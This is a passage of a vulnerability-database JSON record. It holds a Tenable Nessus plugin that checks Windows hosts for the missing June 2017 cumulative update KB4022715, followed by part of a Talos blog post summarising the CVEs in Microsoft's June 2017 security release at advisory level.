"CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", 
"cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022715.NASL", "href": "https://www.tenable.com/plugins/nessus/100760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100760);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0173\",\n \"CVE-2017-0193\",\n \"CVE-2017-0215\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8496\",\n \"CVE-2017-8497\",\n \"CVE-2017-8498\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 
98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98873,\n 98878,\n 98879,\n 98880,\n 98882,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98940,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022715\");\n script_xref(name:\"MSFT\", value:\"MS17-4022715\");\n\n script_name(english:\"KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for presence of the patch rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4022715. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0173,\n CVE-2017-0215, CVE-2017-0216, CVE-2017-0218,\n CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. 
(CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. 
An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. 
An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\");\n # https://support.microsoft.com/en-us/help/4022715/windows-10-update-kb4022715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac6572f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022715 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution 
Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-06';\nkbs = make_list('4022715');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS 
(Windows Nano Server)\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(\n os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0173", "CVE-2017-0193", "CVE-2017-0215", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0260", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0286", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8469", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8472", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8488", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8499", "CVE-2017-8506", "CVE-2017-8507", "CVE-2017-8508", "CVE-2017-8509", "CVE-2017-8510", "CVE-2017-8511", "CVE-2017-8512", "CVE-2017-8513", "CVE-2017-8514", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", 
"CVE-2017-8527", "CVE-2017-8528", "CVE-2017-8529", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8534", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8545", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8550", "CVE-2017-8551", "CVE-2017-8553", "CVE-2017-8555"], "description": "Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, Sharepoint, Skype for Business, Lync, and Windows.<br /><br /><a name='more'></a><br /><h3 id=\"h.hv5a65yfsbxp\">Vulnerabilities Rated Critical</h3><h4 id=\"h.wfa2xeyn8j0o\">CVE-2017-0283</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. This can be exploited through multiple vectors including viewing a specially crafted website or a user opening a specially crafted document file.<br /><h4 id=\"h.pd0tltwr72p2\">CVE-2017-0291 / CVE-2017-0292</h4>These are remote code execution vulnerability in Microsoft Windows if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.<br /><h4 id=\"h.hv36855sqvlr\">CVE-2017-0294</h4>This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. 
This is exploitable by an attacker having a user open a specially crafted cabinet file or spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.<br /><h4 id=\"h.diewipjyn91o\">CVE-2017-8464</h4>This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.<br /><h4 id=\"h.wbb780pr8m8i\">CVE-2017-8496 / CVE-2017-8497</h4>These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. The resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website.<br /><h4 id=\"h.1z06wiwr79tf\">CVE-2017-8499</h4>This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website.<br /><h4 id=\"h.i1b4odd02i18\">CVE-2017-8517</h4>This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website resulting in the attacker gaining full control of the affected system.<br /><h4 id=\"h.3l2zoggepikn\">CVE-2017-8520</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. 
This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.hirfaaudj8y2\">CVE-2017-8522</h4>This is a remote code execution vulnerability in the way the JavaScript engines render when handling objects in memory in Microsoft browsers including both Internet Explorer and Edge. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.xpxmg2ydkif2\">CVE-2017-8524</h4>This is a remote code execution vulnerability in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.<br /><h4 id=\"h.j0uggxwjmgay\">CVE-2017-8527</h4>This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. There are multiple ways this vulnerability can be exploited including a user viewing a specially crafted website and a user opening a specially crafted document.<br /><h4 id=\"h.a2u2lz7ol3bu\">CVE-2017-8528</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. There are multiple ways this vulnerability can be exploited including a user viewing a specially crafted website and a user opening a specially crafted document.<br /><h4 id=\"h.bx2hk4byyp0\">CVE-2017-8543</h4>This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.pdkn0478ls9v\">CVE-2017-8548 / CVE-2017-8549</h4>These are remote code execution vulnerabilities in the JavaScript engines of Microsoft Browsers related to improper handling of objects in memory. 
This can be exploited by having a user view a specially crafted website.<br /><h3 id=\"h.gpoya8yq4g7y\">Vulnerabilities Rated as Important</h3><h4 id=\"h.2bzwegrsdvuh\">CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219</h4>These are security feature bypass vulnerabilities in Device Guard that could allow the attacker to inject malicious code into a Windows PowerShell session. This can be exploited by an attacker with access to a local machine by injecting malicious code into a script that is trusted by the Code Integrity policy.<br /><h4 id=\"h.fbwxsdtpm92q\">CVE-2017-0193</h4>This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.<br /><h4 id=\"h.e4h7wyh0j9ao\">CVE-2017-0260 / CVE-2017-8506</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. They can be exploited by a user opening a specially crafted Office document and can result in the attacker gaining full control of the affected system.<br /><h4 id=\"h.d0s8jre8ln5i\">CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285</h4>These are information disclosure vulnerabilities in Windows Uniscribe related to improper disclosure of the contents of its memory. These can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.bo1p344p5bt2\">CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289</h4>These are information disclosure vulnerabilities in the Windows GDI functionality that result in disclosure of the contents of memory. 
This can be exploited by a user opening a specially crafted document or by convincing a user to access an untrusted webpage.<br /><h4 id=\"h.rc19ikpi9rkx\">CVE-2017-0295</h4>This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\\Users\\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.<br /><h4 id=\"h.ukhf4bu3xpr9\">CVE-2017-0296</h4>This is a privilege escalation vulnerability that impacts Windows 10. The vulnerability is a buffer overrun corruption that can result in escalation of privilege. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.9qf2te7i5b1f\">CVE-2017-0297</h4>This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.lotk64hjlvjg\">CVE-2017-0298</h4>This is a privilege escalation vulnerability in Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to properly authenticate a client. Exploitation occurs when an attacker who is logged into the system executes a specially crafted application that would exploit the vulnerability after another user logs on to the same system via Terminal Services or Fast User Switching.<br /><h4 id=\"h.v8sfr1cbca79\">CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address allowing the attacker to retrieve information to potentially bypass Kernel Address Space Layout Randomization (KASLR). 
The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.<br /><h4 id=\"h.tyo4moefstll\">CVE-2017-8460</h4>This is an information disclosure vulnerability in Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.<br /><h4 id=\"h.wflwqpqh38w8\">CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468</h4>These are use-after-free vulnerabilities that can result in privilege escalation. These are specifically triggered when Windows improperly handles objects in memory. These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.<br /><h4 id=\"h.loqaz6h61hfq\">CVE-2017-8469 / CVE-2017-8470</h4>These are information disclosure vulnerabilities related to the way the Windows kernel improperly initializes objects in memory. These can be triggered by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.ahczr2jz5r7j\">CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.r3dx3kkvmfcz\">CVE-2017-8493</h4>This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. 
This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.<br /><h4 id=\"h.p3llcf1m8rq5\">CVE-2017-8494</h4>This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.6462oxbspxq3\">CVE-2017-8507</h4>This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. This can be exploited by opening a specially crafted email message.<br /><h4 id=\"h.y14yeg9hmtps\">CVE-2017-8508</h4>This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.<br /><h4 id=\"h.kqtny2lmhpy4\">CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.<br /><h4 id=\"h.o1ru3izc54qs\">CVE-2017-8514</h4>This is a reflective cross site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server and will run the script in the security context of the current user. 
